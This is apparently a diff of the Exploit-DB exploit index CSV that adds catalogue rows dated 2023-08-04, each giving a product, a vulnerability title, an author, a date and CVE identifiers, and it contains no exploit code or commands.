+51642,exploits/hardware/remote/51642.py,"ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)",2023-08-04,"Riyan Firmansyah of Seclab",remote,hardware,,2023-08-04,2023-08-04,0,,,,,,
 9858,exploits/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hard-Coded Password",2009-10-08,"Marek Kroemeke",remote,hardware,8022,2009-10-07,2016-10-29,1,CVE-2009-3710;OSVDB-58858,,,,,
 8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware,,2009-03-22,,1,OSVDB-56342;OSVDB-56341;OSVDB-56340;OSVDB-56339,,2009-Louhi_CMC-brute_090323.zip,,,http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip
 24892,exploits/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",remote,hardware,,2013-03-26,2013-03-26,0,OSVDB-91630,,,,,
@@ -3886,6 +3887,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30915,exploits/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,remote,hardware,32764,2014-01-14,2014-01-14,1,OSVDB-101653;CVE-2014-0659,"Metasploit Framework (MSF)",,,,
 32938,exploits/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,remote,hardware,32674,2014-04-18,2014-04-18,0,OSVDB-106324,,,,,
 23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
+51657,exploits/hardware/remote/51657.txt,"Shelly PRO 4PM v0.11.0 - Authentication Bypass",2023-08-04,"The Security Team [exploitsecurity.io]",remote,hardware,,2023-08-04,2023-08-04,0,CVE-2023-33383,,,,,
 35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
 40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
 51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
@@ -12053,6 +12055,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,,
 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
+51646,exploits/multiple/webapps/51646.txt,"Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)",2023-08-04,"Ahmet Ümit BAYRAM",webapps,multiple,,2023-08-04,2023-08-04,0,,,,,,
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
@@ -13305,6 +13308,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,,,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
+51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info
@@ -13456,6 +13460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37407,exploits/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",webapps,php,,2012-06-15,2015-06-28,1,,,,,,https://www.securityfocus.com/bid/54023/info
 37438,exploits/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 - Cross-Site Scripting",2012-06-21,"Sooraj K.S",webapps,php,,2012-06-21,2015-06-30,1,,,,,,https://www.securityfocus.com/bid/54117/info
 45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80,2018-12-09,2018-12-10,0,CVE-2018-19877,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comloganalyzer-4.1.6.tar.gz,
+51643,exploits/php/webapps/51643.txt,"Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting",2023-08-04,Pedro,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-36306,,,,,
 47217,exploits/php/webapps/47217.txt,"Adive Framework 2.0.7 - Cross-Site Request Forgery",2019-08-08,"Pablo Santiago",webapps,php,80,2019-08-08,2019-08-08,0,CVE-2019-14346,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
 47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,,2019-11-08,2019-11-08,0,CVE-2019-14347,,,,,
 47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php,,2020-01-28,2020-02-03,1,CVE-2020-7991,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
@@ -15258,6 +15263,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6594,exploits/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,webapps,php,,2008-09-26,2016-12-21,1,OSVDB-49892;CVE-2008-4366,,,,http://www.exploit-db.comcameralife-2.6.2b4.zip,
 6710,exploits/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,webapps,php,,2008-10-08,2016-12-26,1,OSVDB-51859;CVE-2008-6087;OSVDB-51857;CVE-2008-6086,,,,http://www.exploit-db.comcameralife-2.6.2b4.zip,
 12251,exploits/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,webapps,php,,2010-04-14,,1,,,,,,
+51656,exploits/php/webapps/51656.txt,"Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload",2023-08-04,"Rajdip Dey Sarkar",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-39115,,,,,
 30003,exploits/php/webapps/30003.txt,"Campsite 2.6.1 - '/implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-03,1,CVE-2006-5911;OSVDB-34222,,,,,https://www.securityfocus.com/bid/23874/info
 30004,exploits/php/webapps/30004.txt,"Campsite 2.6.1 - '/implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-03,1,CVE-2006-5911;OSVDB-34223,,,,,https://www.securityfocus.com/bid/23874/info
 29966,exploits/php/webapps/29966.txt,"Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php,,2007-05-08,2013-12-02,1,CVE-2006-5911;OSVDB-34187,,,,,https://www.securityfocus.com/bid/23874/info
@@ -20449,6 +20455,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8278,exploits/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion",2009-03-24,dun,webapps,php,,2009-03-23,,1,OSVDB-52858;CVE-2009-2313,,,,,
 2836,exploits/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - 'index.asp' SQL Injection",2006-11-23,ajann,webapps,php,,2006-11-22,,1,OSVDB-30674;CVE-2006-6149,,,,,
 48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,,2020-04-21,2020-04-21,0,,,,,,
+51647,exploits/php/webapps/51647.txt,"JLex GuestBook 1.6.4 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 30739,exploits/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",webapps,php,,2007-11-05,2014-01-06,1,CVE-2007-5954;OSVDB-39867,,,,,https://www.securityfocus.com/bid/26331/info
 6669,exploits/php/webapps/6669.txt,"JMweb - 'src' Local File Inclusion",2008-10-04,SirGod,webapps,php,,2008-10-03,2016-12-26,1,OSVDB-48805;CVE-2008-4522;OSVDB-48804,,,,,
 34806,exploits/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,webapps,php,,2009-07-09,2014-09-28,1,CVE-2009-2440;OSVDB-55725,,,,,https://www.securityfocus.com/bid/43697/info
@@ -20498,6 +20505,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51629,exploits/php/webapps/51629.txt,"Joomla HikaShop 4.7.4 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
+51645,exploits/php/webapps/51645.txt,"Joomla JLex Review 6.0.1 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
 51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
@@ -24303,7 +24311,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2325,exploits/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,webapps,php,,2006-09-06,,1,OSVDB-30790;CVE-2006-4678;OSVDB-30789,,,,,
 26818,exploits/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4262;OSVDB-21751,,,,,https://www.securityfocus.com/bid/15857/info
 26819,exploits/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,webapps,php,,2005-12-14,2013-07-14,1,CVE-2005-4263;OSVDB-21752,,,,,https://www.securityfocus.com/bid/15857/info
-51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-07-15,0,,,,,,
+51587,exploits/php/webapps/51587.txt,"News Portal v4.0 - SQL Injection (Unauthorized)",2023-07-15,"Hubert Wojciechowski",webapps,php,,2023-07-15,2023-08-04,1,,,,,,
 19180,exploits/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,,2012-06-16,2012-06-17,1,OSVDB-82995;OSVDB-82994;OSVDB-82993;OSVDB-82992,,,,,https://www.vulnerability-lab.com/get_content.php?id=600
 15843,exploits/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,webapps,php,,2010-12-29,2010-12-29,0,,,,,,
 44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,,2018-02-13,2018-02-13,0,,,,,,
@@ -26986,15 +26994,21 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30911,exploits/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102246;OSVDB-102163;OSVDB-102147;CVE-2014-10010;CVE-2014-10001,,,,,
 49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,,2020-12-17,2021-02-15,0,CVE-2020-35416,,,,,
 30912,exploits/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102162;OSVDB-102146,,,,,
+51651,exploits/php/webapps/51651.txt,"PHPJabbers Cleaning Business 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4115,,,,,
 30913,exploits/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102161;OSVDB-102160;OSVDB-102145;CVE-2014-10015;CVE-2014-10014,,,,,
 30954,exploits/php/webapps/30954.txt,"PHPJabbers Hotel Booking System 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102223;OSVDB-102222;OSVDB-102219,,,,,
 30910,exploits/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102157;OSVDB-102148,,,,,
+51650,exploits/php/webapps/51650.txt,"PHPJabbers Night Club Booking 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4114,,,,,
 30950,exploits/php/webapps/30950.html,"PHPJabbers Pet Listing Script 1.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102241;OSVDB-102131,,,,,
 32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php,,2008-09-29,2014-03-23,1,,,,,,https://www.securityfocus.com/bid/31467/info
 30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102221,,,,,
+51653,exploits/php/webapps/51653.txt,"PHPJabbers Rental Property Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4117,,,,,
+51649,exploits/php/webapps/51649.txt,"PHPJabbers Service Booking Script 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4113,,,,,
+51648,exploits/php/webapps/51648.txt,"PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4112,,,,,
 50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,php,,2021-11-03,2021-11-03,0,,,,,,
 51416,exploits/php/webapps/51416.txt,"PHPJabbers Simple CMS 5.0 - SQL Injection",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
 51415,exploits/php/webapps/51415.txt,"PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
+51652,exploits/php/webapps/51652.txt,"PHPJabbers Taxi Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4116,,,,,
 30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,,
 30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,,
 2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,,
@@ -32098,6 +32112,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
 35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
 17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
+51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
 35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46341/info
 19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,webapps,php,,2012-06-28,2012-06-29,1,OSVDB-83414;OSVDB-83400,,,,,
@@ -32291,6 +32307,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33699,exploits/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",webapps,php,80,2014-06-09,2014-06-09,0,OSVDB-107773;OSVDB-107772;OSVDB-107771;OSVDB-107770;OSVDB-107769;OSVDB-107768;OSVDB-107767;OSVDB-107766;OSVDB-105981;OSVDB-105980;OSVDB-105979;OSVDB-105978;CVE-2014-4307;CVE-2014-4306,,,,,
 36821,exploits/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",webapps,php,,2015-04-26,2015-04-26,1,OSVDB-121619,,,http://www.exploit-db.com/screenshots/idlt37000/webui.png,,
 39707,exploits/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",webapps,php,80,2016-04-18,2016-04-20,1,,,,http://www.exploit-db.com/screenshots/idlt40000/captura-de-pantalla-de-2016-04-20-192255.png,http://www.exploit-db.comwebutler_v3.2.zip,
+51660,exploits/php/webapps/51660.txt,"Webutler v3.2 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,1,,,,,,
 31982,exploits/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,webapps,php,80,2014-02-28,2014-02-28,0,CVE-2013-6043;OSVDB-99204;CVE-2013-6042;CVE-2013-6041;OSVDB-99203;OSVDB-99202,,,,,
 45775,exploits/php/webapps/45775.txt,"WebVet 0.1a - 'id' SQL Injection",2018-11-05,"Ihsan Sencan",webapps,php,80,2018-11-05,2018-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebvet_2013_07_08.zip,
 9193,exploits/php/webapps/9193.pl,"WebVision 2.1 - 'news.php?n' SQL Injection",2009-07-17,Mr.tro0oqy,webapps,php,,2009-07-16,,1,,,,,,
@@ -32483,6 +32500,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50456,exploits/php/webapps/50456.js,"Wordpress 4.9.6 - Arbitrary File Deletion (Authenticated) (2)",2021-10-25,samguy,webapps,php,,2021-10-25,2021-10-25,1,,,,,,
 49512,exploits/php/webapps/49512.py,"WordPress 5.0.0 - Image Remote Code Execution",2021-02-01,"OUSSAMA RAHALI",webapps,php,,2021-02-01,2021-02-01,0,CVE-2019-89242,,,,,
 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,,
+51663,exploits/php/webapps/51663.txt,"WordPress adivaha Travel Plugin 2.3 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+51655,exploits/php/webapps/51655.txt,"WordPress adivaha Travel Plugin 2.3 - SQL Injection",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 9110,exploits/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",webapps,php,,2009-07-09,2017-05-04,1,CVE-2009-2334;OSVDB-55712,,,,http://www.exploit-db.comWordPress-2.8.zip,http://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked
 23213,exploits/php/webapps/23213.txt,"WordPress Core 0.6/0.7 - 'Blog.header.php' SQL Injection",2003-10-03,"Seth Woolley",webapps,php,,2003-10-03,2012-12-08,1,OSVDB-4609,,,,,https://www.securityfocus.com/bid/8756/info
 30520,exploits/php/webapps/30520.txt,"WordPress Core 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,webapps,php,,2007-08-13,2013-12-27,1,CVE-2007-4482;OSVDB-37299,,,,,https://www.securityfocus.com/bid/25413/info
@@ -32896,6 +32915,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47335,exploits/php/webapps/47335.txt,"WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php,,2019-09-02,2019-09-02,0,,,,,http://www.exploit-db.comevent-tickets.4.10.7.1.zip,
 17794,exploits/php/webapps/17794.txt,"WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",webapps,php,,2011-09-07,2011-09-07,1,OSVDB-86245,"WordPress Plugin",,,http://www.exploit-db.comeventify.zip,
 49130,exploits/php/webapps/49130.py,"Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting",2020-12-01,B3KC4T,webapps,php,,2020-12-01,2020-12-01,0,CVE-2020-29395,,,,,
+51658,exploits/php/webapps/51658.txt,"Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access",2023-08-04,"Miguel Santareno",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-2796,,,,,
+51659,exploits/php/webapps/51659.txt,"Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR",2023-08-04,"Miguel Santareno",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-3219,,,,,
 10929,exploits/php/webapps/10929.txt,"WordPress Plugin Events - SQL Injection",2010-01-02,Red-D3v1L,webapps,php,,2010-01-01,,1,OSVDB-61478,"WordPress Plugin",,,http://www.exploit-db.comevents-calendar.6.6.zip,
 43479,exploits/php/webapps/43479.txt,"WordPress Plugin Events Calendar - 'event_id' SQL Injection",2018-01-10,"Dennis Veninga",webapps,php,,2018-01-10,2018-01-10,0,CVE-2018-5315,,,,,
 44785,exploits/php/webapps/44785.txt,"WordPress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,,2018-05-28,2018-06-01,0,,,,,,
@@ -32949,6 +32970,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46958,exploits/php/webapps/46958.txt,"WordPress Plugin Form Maker 1.13.3 - SQL Injection",2019-06-03,"Daniele Scanu",webapps,php,,2019-06-03,2019-06-03,0,CVE-2019-10866,,,,,
 48509,exploits/php/webapps/48509.txt,"WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php,,2020-05-25,2020-05-25,0,,,,,,
 30002,exploits/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",webapps,php,,2013-12-10,2013-12-10,1,CVE-2013-7187;OSVDB-100877,"WordPress Plugin",,,,
+51664,exploits/php/webapps/51664.txt,"WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution",2023-08-04,"Mehmet Kelepçe",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 17684,exploits/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",webapps,php,,2011-08-18,2011-08-18,1,,"WordPress Plugin",,,http://www.exploit-db.comwpforum.1.7.8.zip,
 16235,exploits/php/webapps/16235.txt,"WordPress Plugin Forum Server 1.6.5 - SQL Injection",2011-02-24,"High-Tech Bridge SA",webapps,php,,2011-02-24,2011-02-24,0,CVE-2011-1047;OSVDB-70994;OSVDB-70993,"WordPress Plugin",,,http://www.exploit-db.comforum-server.zip,http://www.htbridge.ch/advisory/sql_injection_in_wp_forum_server_wordpre
 17828,exploits/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",webapps,php,,2011-09-13,2011-09-13,1,OSVDB-75463;CVE-2012-6625,"WordPress Plugin",,,http://www.exploit-db.comforum-server.zip,
@@ -33188,6 +33210,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
